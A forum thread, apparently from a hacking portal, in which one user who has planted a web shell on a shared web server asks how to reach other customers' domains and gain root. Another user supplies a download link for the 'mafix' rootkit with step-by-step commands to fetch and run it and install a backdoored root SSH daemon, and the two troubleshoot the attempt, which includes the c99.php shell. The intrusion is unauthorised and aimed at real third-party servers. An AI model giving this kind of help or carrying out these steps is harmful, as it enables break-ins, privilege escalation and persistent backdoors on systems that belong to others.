Waraxe IT Security Portal

clubreseau · Advanced user

I uploaded a shell on a domain name and i want to see another domain on the same box, i try and i cant it say [ Read-Only ] i cant read or see any files if I exit the directory of the domain where I upload the shell
safe-mode is off

someone can help me and give me some trick

thank you

vince213333 · Advanced user

That's simply because you're logged in as a user which doesn't have the rights to see the content of the other users.

The only workaround is to either get a shell up in a directory where you can log in as the user u need or simply root the box ^^

clubreseau · Advanced user

how i can get the root ? rookit ?
kernel version the box use is 2.6.18-164.11.1.el5

clubreseau · Advanced user

someone can give me a rootkit for kernel 2.6.18

and explain how it work

thank you

vince213333 · Advanced user

A rootkit for 2.6 I found:

http://www.sendspace.com/file/7dxgz3

Usage:
upload the tar file to somewhere you can download it from directly
wget http://direct_link_to_mafix.tar.gz
tar xvzf mafix.tar.gz
cd mafix/
./root password port

to make backdoored sshd on <port> with login root/<password>

I just want to say this one is backdoored. It sends the password to somewhere, likely the creator of the kit.

clubreseau · Advanced user

I write ./root 123456 4343

I receive

[1;30m ___ ___ ___ [1;37m [1;30m ___ [0m
[1;30m /__/\ / /\ / /\ [1;37m ___ [1;30m /__/| [0m
[1;30m | |::\ / /::\ / /:/_ [1;37m / /\ [1;30m | | Neutral

[0m
[1;30m | | Neutral

:\ / /:/\:\ / /:/ /\ [1;37m / /:/ [1;30m | | Neutral

[0m
[1;30m __|__| Neutral

\:\ / /:/~/::\ / /:/ /:/ [1;37m/__/::\ [1;30m __|__| Neutral

[0m
[1;30m /__/::: Neutral

\:\ /__/:/ /:/\:\ /__/:/ /:/ [1;37m\__\/\:\__ [1;30m /__/::::\____[0m
[1;30m \ \:\~~\__\/ \ \:\/:/__\/ \ \:\/:/ [1;37m \ \:\/\ [1;30m ~\~~\::::/[0m
[1;30m \ \:\ \ \::/ \ \::/ [1;37m \__\::/[1;30m |~~| Neutral

~~ [0m
[1;30m \ \:\ \ \:\ \ \:\ [1;37m /__/:/ [1;30m | | Neutral

[0m
[1;30m \ \:\ \ \:\ \ \:\ [1;37m \__\/ [1;30m | | Neutral

[0m
[1;30m \__\/ \__\/ \__\/ [1;37m [1;30m |__|/ [0m
[1;37m[0m
[1;37m - the ferrari of rootkits - [0m
[1;30mmafix![1;37m > [1;30m extracting libs...[0m
[1;30mmafix![1;37m > [1;30m you need to be root to backdoor the box...[0m

now I open ssh2

for the ip I look on whois domaine name it give me the ip

I enter the ip with port 4343 with login root and password 123456

and I receive when i try to connect

09:24:25.565 Starting a new SSH2 session.
09:24:25.566 Connecting to SSH2 server.
09:24:46.602 Connection failed. Connect() failed: Windows error 10060:
server not respond.

why ?

vince213333 · Advanced user

Can't tell, didn't try it myself. The server might be patched or properly secured.

In any case, that output isn't normal.

clubreseau · Advanced user

pour ssh en root ses bien a partir de mon ordinateur mon client ssh windows ?

ou sshd avec c99.php a partir du shell

vince213333 · Advanced user

Je l'essaierais avec le shell avant de l'essayer a partir de vous même.

clubreseau · Advanced user

pour ssh en root ses bien a partir de mon ordinateur mon client ssh windows ?

ou sshd avec c99.php a partir du shell

vince213333 · Advanced user

normallement, ça marche avec ton client de windows.

le problème c'est que je ne sais pas si vous avez gagné root avec ce rootkit, parce que je ne pense pas que "[1;30mmafix![1;37m > [1;30m you need to be root to backdoor the box...[0m " veut dire que vous êtes root Confused

new · Beginner